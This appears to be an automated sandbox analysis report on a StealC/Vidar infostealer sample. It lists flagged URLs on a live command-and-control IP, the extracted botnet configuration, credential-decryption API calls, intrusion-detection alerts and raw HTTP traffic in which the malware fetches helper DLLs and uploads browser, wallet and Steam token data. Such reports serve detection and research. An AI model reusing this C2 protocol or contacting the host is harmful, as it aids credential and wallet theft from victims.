Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
Instruction ID: a16fb6ab7003d5cbd9dda262588bce2a76fe2cdfe3e240d0775e5f2d5e477e4b
Opcode Fuzzy Hash: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
Instruction Fuzzy Hash: 45F090729006049FD7A1BFB85806B8D73A3AF02730F24514DF404A62D3CB649D81DF9E

Source: http://185.215.113.37/e2b1563c6670f193.phpBR	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpc=0f	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllu	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpCoinomi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpq	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpY	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpU1R	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpic	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll9	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllg	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpus.wallet	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php1	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpogZf	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpER	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllb	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpesSf	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.690000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.690000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00699B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0069C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00697240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00697240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00699AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_006A8EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 45 46 42 44 37 35 32 44 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="hwid"5EEFBD752DB61709341086------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build"save------KFCFBFHIEBKJKFHIEBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 4a 45 47 49 45 42 46 48 43 41 41 4b 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------HDBKJEGIEBFHCAAKKEBAContent-Disposition: form-data; name="message"browsers------HDBKJEGIEBFHCAAKKEBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="message"plugins------IDAEBGCAAECAKFHIIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"fplugins------GDBFBFCBFBKECAAKJKFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJEHost: 185.215.113.37Content-Length: 7255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIIDHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file"------IEHJJECBKKECFIEBGCAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 2d 2d 0d 0a Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file"------BAECFHJEBAAFIEBGHIIE--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="message"wallets------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="message"ybncbhylepme------CAKKJKKECFIDGDHIJEGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIIDHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file"------HDGIEBGHDAEBGDGCFIID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 2d 2d 0d 0a Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="message"files------KECGDBFCBKFIDHIDHDHI--
